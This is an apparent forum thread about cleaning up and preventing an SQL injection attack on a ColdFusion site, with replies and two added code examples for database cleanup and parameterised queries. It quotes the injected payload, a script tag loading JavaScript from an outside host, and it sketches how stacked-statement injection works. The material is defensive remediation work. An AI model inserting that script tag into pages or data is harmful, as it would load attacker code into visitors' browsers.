rlewis4424 asked:

I need solutions to an SQL injection attack for coldfusion pages.

Database got hit with an SQL injection attack. It's adding this line of code to some of the fields in the database.
I've started to change the forms on the site to use parameters (I should have done this to begin with). Is there anything else that I need to do to resolve this ASAP? Everything I find is for ASP. Is there cleanup code to erase the script from all tables? Please help!!
</title><script src="http://jjmaoduo2.3322.org/csrss/w.js"></script>


pataya6:

Not sure if this would work... but you could export the whole SQL file as a .txt file on your local machine.

Then simply do a find and replace using your favorite tool.
You need to use <CFQUERYPARAM> on all SQL operations; this will prevent all SQL injection.
Kevin Cross:
Since this was put in by malicious code taking advantage of your connection to SQL Server from CFML, it is only appropriate that you use your own CFML code to repair it. You can use a CFQUERY to get a listing of all column names from your infected table. Then, using CFLOOP over each column name, run an update CFQUERY that does REPLACE(columnname, '</title><script src="h ttp://jjmaoduo2.3322.org/csrss/w.js"></script>', ''), which will replace each occurrence of that string with an empty string.
And I guess you can construct one big update statement using the loop and execute one massive update query instead of doing individual column updates, if you prefer:

<cfset sql = "UPDATE table1 SET" />
<cfset i = 0 />
<cfloop ...>
    <cfset i = i + 1 />
    <!--- comma-separate every column assignment after the first --->
    <cfif i GT 1><cfset sql &= "," /></cfif>
    <cfset sql &= " #columnname# = REPLACE(#columnname#, '</title><script src=""h ttp://jjmaoduo2.3322.org/csrss/w.js""></script>', '')" />
</cfloop>

Just use a counter in the loop to determine when you are on the 2nd, 3rd, etc. column, and add a "," in front to separate the column update clauses. No need for a WHERE clause, since you want to clean all records, and if the value doesn't exist you are just putting the same value back into the column. I would do a cfoutput of the generated SQL to make sure it is parsing/looking correct before executing it against your live database.

In fact, if you want, you can use the code just to create the SQL query, which you can then execute in SQL Studio yourself, allowing you to comment out certain sections at a time without having to type in all the code to begin with if you have a lot of columns/tables affected.
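The approach in the answer above, written out as an added example (this is not code from the thread or from any of the posters). It reads every character column in the database from INFORMATION_SCHEMA.COLUMNS on SQL Server, builds one UPDATE per table with the comma-separated REPLACE() assignments the post describes, prints the statements for review, and only runs them behind a flag. Assumptions: a datasource named myDSN (hypothetical) whose login can read INFORMATION_SCHEMA and update every table; SQL Server 2005 or later, because REPLACE() rejects text/ntext columns and the example casts those to varchar(max)/nvarchar(max); and that the stored payload matches the string from the question exactly.

```coldfusion
<!--- Hypothetical datasource name: use the DSN your pages query with. --->
<cfset dsn = "myDSN" />

<!--- The string the attack wrote into the data; it must match the stored value exactly. --->
<cfset injected = '</title><script src="http://jjmaoduo2.3322.org/csrss/w.js"></script>' />
<!--- Double any single quote so the literal is safe inside the generated SQL. --->
<cfset injectedSql = Replace(injected, "'", "''", "all") />

<!--- Every character column in the database (SQL Server INFORMATION_SCHEMA).
      text/ntext are included, but REPLACE() rejects them, so they get a CAST below. --->
<cfquery name="cols" datasource="#dsn#">
    SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, DATA_TYPE
    FROM INFORMATION_SCHEMA.COLUMNS
    WHERE DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar', 'text', 'ntext')
    ORDER BY TABLE_SCHEMA, TABLE_NAME, ORDINAL_POSITION
</cfquery>

<!--- Build one UPDATE per table: SET every character column, plus a WHERE that
      limits the write to rows where at least one column actually holds the payload. --->
<cfset statements = ArrayNew(1) />
<cfset currentTable = "" />
<cfloop query="cols">
    <cfset fullName = "[#TABLE_SCHEMA#].[#TABLE_NAME#]" />
    <cfif fullName NEQ currentTable>
        <cfif currentTable NEQ "">
            <cfset ArrayAppend(statements, updateSql & " WHERE" & whereSql) />
        </cfif>
        <cfset currentTable = fullName />
        <cfset updateSql = "UPDATE #fullName# SET" />
        <cfset whereSql = "" />
        <cfset n = 0 />
    </cfif>

    <cfif DATA_TYPE EQ "ntext">
        <cfset expr = "CAST([#COLUMN_NAME#] AS nvarchar(max))" />
    <cfelseif DATA_TYPE EQ "text">
        <cfset expr = "CAST([#COLUMN_NAME#] AS varchar(max))" />
    <cfelse>
        <cfset expr = "[#COLUMN_NAME#]" />
    </cfif>

    <!--- Comma / OR separators after the first column, as the post above describes. --->
    <cfset n = n + 1 />
    <cfif n GT 1>
        <cfset updateSql &= "," />
        <cfset whereSql &= " OR" />
    </cfif>
    <cfset updateSql &= " [#COLUMN_NAME#] = REPLACE(#expr#, '#injectedSql#', '')" />
    <cfset whereSql &= " CHARINDEX('#injectedSql#', #expr#) > 0" />
</cfloop>
<cfif currentTable NEQ "">
    <cfset ArrayAppend(statements, updateSql & " WHERE" & whereSql) />
</cfif>

<!--- Print the statements for review before anything is run against live data. --->
<cfoutput>
    <cfloop array="#statements#" index="stmt">#HTMLEditFormat(stmt)#;<br /></cfloop>
</cfoutput>

<!--- Set to true only after reviewing the output (and taking a backup).
      PreserveSingleQuotes() is required: cfquery otherwise doubles every single quote
      inside an interpolated string and the generated SQL would no longer parse. --->
<cfset runCleanup = false />
<cfif runCleanup>
    <cfloop array="#statements#" index="stmt">
        <cfquery datasource="#dsn#">#PreserveSingleQuotes(stmt)#</cfquery>
    </cfloop>
</cfif>
```

Take a full backup before flipping runCleanup, and compare the printed statements against a few known-infected rows first. The printed output can equally be pasted into SQL Server Management Studio and run table by table, which is what the answer above suggests for large databases. Note that the cleanup needs UPDATE on every table, which is the same privilege that let the attacker write the script tag everywhere; consider a separate, more restricted login for the application once the data is clean.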
rlewis4424 (asker):

Thanks for the responses! I think I pretty much know now how to clean the database up. But what about preventing this from happening in the future? What things do I need to change?
As I first said:

You need to use <CFQUERYPARAM> on all SQL operations; this will prevent all SQL injection.

I have changed all forms to use CFQueryparam and the problem still persists.
For fields that are strictly numeric, you can check whether the value being passed is numeric before storing it. So use a variable that has a default value of 0 (or whatever is appropriate for the field), then wrap the setting of that variable from the query string / user value in an if statement that checks whether the string is numeric.

For string fields, you can use a replace statement and a regular expression to look for all characters or character combinations you don't want and replace them, as long as the field doesn't have valid entries that use those same combinations.

You could try to run values through URLEncode.
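The prevention advice in this thread, shown as an added example that is not from any of the posters: the vulnerable pattern next to its cfqueryparam version. The datasource myDSN, the products table and the url/form field names are placeholders. The point that matters for "I changed all forms and it still happens" is that cfqueryparam has to wrap every dynamic value in every query, not only form fields: url, cookie and cgi values reach the database the same way, and cfquery's automatic doubling of single quotes inside #...# gives no protection in a numeric context, where no quote is needed to append another statement.

```coldfusion
<!--- Hypothetical datasource, table and field names; substitute your own. --->
<cfset dsn = "myDSN" />

<!--- BEFORE (vulnerable): url.id is spliced into the SQL text. cfquery doubles single
      quotes inside #...# on its own, but a numeric context needs no quote, so a request
      like ?id=1;<second statement>-- runs the second statement with the DSN login's rights,
      e.g. an UPDATE that appends a script tag to every text column of every table. --->
<cfquery name="product" datasource="#dsn#">
    SELECT id, name FROM products WHERE id = #url.id#
</cfquery>

<!--- AFTER: every dynamic value is bound with cfqueryparam, whatever scope it came
      from (url, form, cookie, cgi). The driver sends it as a parameter, never as SQL
      text, so it cannot terminate the statement or start another one. --->
<cfparam name="url.id" default="0" />
<cfif NOT IsNumeric(url.id)>
    <cfthrow message="id must be numeric" />
</cfif>
<cfquery name="product" datasource="#dsn#">
    SELECT id, name FROM products
    WHERE id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer" />
</cfquery>

<!--- String columns: the type plus maxlength rejects over-long input before it is sent. --->
<cfparam name="form.id" default="0" />
<cfparam name="form.name" default="" />
<cfquery datasource="#dsn#">
    UPDATE products
    SET name = <cfqueryparam value="#form.name#" cfsqltype="cf_sql_varchar" maxlength="100" />
    WHERE id = <cfqueryparam value="#form.id#" cfsqltype="cf_sql_integer" />
</cfquery>

<!--- A list of ids (checkboxes, multi-select) uses list="true" rather than #form.ids# inside IN (). --->
<cfparam name="form.ids" default="0" />
<cfquery name="selected" datasource="#dsn#">
    SELECT id, name FROM products
    WHERE id IN (<cfqueryparam value="#form.ids#" cfsqltype="cf_sql_integer" list="true" />)
</cfquery>

<!--- Identifiers (sort column, table name) cannot be bound as parameters. Check them
      against a fixed list and never use the raw request value. --->
<cfset allowedSort = "id,name" />
<cfparam name="url.sort" default="id" />
<cfif NOT ListFindNoCase(allowedSort, url.sort)>
    <cfset url.sort = "id" />
</cfif>
<cfquery name="product" datasource="#dsn#">
    SELECT id, name FROM products ORDER BY #url.sort#
</cfquery>
```

As defence in depth, restrict the datasource's "Allowed SQL" in the ColdFusion Administrator to the statement types the site actually issues, and give the database login only those rights; an injected statement can then do no more than the page it rode in on.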
ASKER CERTIFIED SOLUTION
Yamagami